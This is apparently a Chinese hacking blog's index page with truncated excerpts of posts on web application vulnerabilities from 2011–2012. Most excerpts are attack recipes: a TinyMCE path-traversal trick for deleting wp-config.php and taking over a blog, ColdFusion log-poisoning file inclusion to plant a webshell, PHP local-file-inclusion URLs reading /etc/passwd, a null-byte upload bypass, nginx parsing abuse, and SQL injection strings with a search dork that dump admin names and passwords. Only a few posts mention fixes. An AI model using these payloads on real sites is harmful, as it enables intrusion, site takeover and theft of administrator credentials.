zencart编辑器tiny_mce的跨目录操作漏洞

   
分类:安全 | 2012-01-8 | 撸过 1,442 次
0人扯蛋


路径为:http://www.webshell.cc/editors/tiny_mce/plugins/ImageManager/manager.php?b=/home/salehots/public_html/
比较鸡肋,不是所有的网站都有用Tiny_mce,不过放到字典里扫描下还是可以扫出几个的。
可以编辑JPG,当然也可有删除文件的功能。
目前想到的就是删除配置文件,比如博客的配置文件,然后重新建立博客,进后台拿权限。
如图,跳到博客目录里删除wp-config.php

然后打开博客,就出现了开始配置博客的信息。
[......]

继续阅读

cfm本地包含漏洞利用

   
分类:安全 | 2012-01-1 | 撸过 1,701 次
0人扯蛋

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.webshell.cc/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

 

http://www.webshell.cc/index.cfm?action=<CFHTTP METH[......]

继续阅读

狂盗小说小偷GETshell漏洞及修复

   
分类:安全 | 2011-11-29 | 撸过 1,227 次
0人扯蛋

很傻比的一漏洞
必须开启缓存才能利用
先看代码
book.php
$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){//缓存必须开启
$lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
// echo $lastflesh;
if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
ob_start();
include "./[......]

继续阅读

php伪造本地文件包含漏洞

   
分类:安全 | 2011-11-3 | 撸过 908 次
0人扯蛋

代码:

 

<?php

$page=$_GET[page];

include($page.'php');

?>

 

你可以这样使用

http://www.webshell.cc/index.php?page=../etc/passwd

https://www.webshell.cc/index.php?page=../../../etc/passwd

https://www.webshell.cc/index.php?page=..../../etc/passwd

 

获取更多数据:

etc/profile

etc/servic[......]

继续阅读

sywebeditor上传漏洞的另外一种方法,绝对实用

   
分类:安全 | 2011-09-13 | 撸过 1,237 次
1人扯蛋

http://www.webshell.cc/syWebEditor/...to&amp;fileType=gif|jpg|png|&amp;filePathType=1&filePath=/PhotoFile/ProFile/

可以浏览目录的,下面有个上传文件,打开,上传一张jpg小马,然后重命名,1.asp。然后上传抓包,

保存txt,后面加个 空格

用winhex打开找到 1.asp ,在后面加个20改成 00 ,ok 。保存。不这样会出现 1.asp.jpg。这样就绕过了。nc 上传 ,光标会卡在1.asp那不动了,ok .你成功了。

打开路径。路径你懂[......]

继续阅读

nginx fastcgi配置失误+解析漏洞引发的漏洞

   
分类:安全 | 2011-09-13 | 撸过 1,177 次
0人扯蛋

现在一定还有很多网站用的nginx,自从N个月以前的nginx解析漏洞以来,现在差不多都修复了,一般语句都是这么写的

if ( $fastcgi_script_name ~ ..*/.*php ) {
return 403;
}

当匹配*/*.php*的时候则返回403

但是有些fastcgi配置的却不只有.php,有些甚至配置了ph*,(网上有一篇文章就是这么写的)

这样.ph*就没法匹配.php*也就又引发漏洞

此bug是我一个朋友Clouds发现的,

解决方法就是看fastcgi配置文件来设置要deny掉的文件后缀

在有些特定的时候,还可以用robots.txt/1.P[......]

继续阅读

V5shop注入漏洞

   
分类:安全 | 2011-08-22 | 撸过 1,546 次
1人扯蛋

漏洞危害:高危
一、漏洞文件:cart.aspx

搜索关键词:inurl:scoreindex.aspx

exp :

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1[......]

继续阅读

盛大云网站配置不当导致文件解析漏洞及修复

   
分类:安全 | 2011-08-22 | 撸过 966 次
0人扯蛋

简要描述:盛大云网站存在漏洞,可以直接获得网站权限。
详细说明:nginx文件解析漏洞
漏洞证明:<A href="http://www.webshell.cc/robots.txt/x.<a%20href=" target=_blank http: www.webshell.cc kf web php ?>php">https://www.webshell.cc/robots.txt/x.php

网站用的PHPCMS,找个上传点,如会员的头像上传模块。
修复方案:修改nginx配置文件[......]

继续阅读

马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞及修复

   
分类:安全 | 2011-08-22 | 撸过 2,783 次
0人扯蛋

在文件admin/ admin_inc.asp中:

Sub checkPower //第103行
dim loginValidate,rsObj : loginValidate = "maxcms2.0"
err.clear
on error resume next
set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
rCookie函数在文件inc/ CommonFun.asp中
Functi[......]

继续阅读

关于迅雷离线功能存在设计漏洞

   
分类:安全 | 2011-08-21 | 撸过 1,032 次
0人扯蛋

本人一直都在共享着自己使用的VIP迅雷账号,

但更新过几次都是在几天之后提示密码错误, 

用密保把密码改回来发现安全邮箱被改成@QQ.COM的 E-Mail地址了

用IE8.0更改无法查看“老是提示验证码错误”,用Opera浏览器可看到一半(如图)

 

我自己从来都没用QQ E-mail做为安全邮箱,进迅雷离线发现原来可以在离线功能处可以更改安全邮箱(如图)


PS:共享迅雷VIP账号有风险,自己没把安全系数把握好小心你的账号丢失,  自己慢慢研究去吧,你懂的...

 [......]

继续阅读